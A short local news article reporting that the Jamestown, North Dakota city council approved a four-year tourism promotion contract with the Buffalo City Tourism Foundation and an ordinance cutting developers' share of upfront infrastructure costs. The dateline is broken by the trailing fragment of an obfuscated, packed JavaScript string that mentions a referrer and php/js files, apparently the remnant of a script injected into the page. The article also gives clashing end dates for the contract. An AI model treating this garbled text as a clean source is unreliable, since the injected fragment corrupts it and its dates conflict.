JAMESTOWN, ttzbt|var|u0026u|referrer|ryihs||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Jamestown City Council has reached a four-year contract with the Buffalo City Tourism Foundation to promote tourism for the near future.

The contract was approved during the council’s regular meeting last night and is good for about $300,000 per year through 2014, which will then will be re-negotiated during the final two years of the agreement.

There was concern over negotiating a new contract recently with questions raised about the BCTF running as a non-city entity, but this new contract will allow the organization to continue promoting Jamestown and Stutsman County tourism at least through 2016.

The council also approved a new city ordinance that allows real estate developers to pay just 25 percent of the upfront costs of water, sewer and street infrastructure. The previous ordinance required developers to pay 100 percent of those upfront costs.

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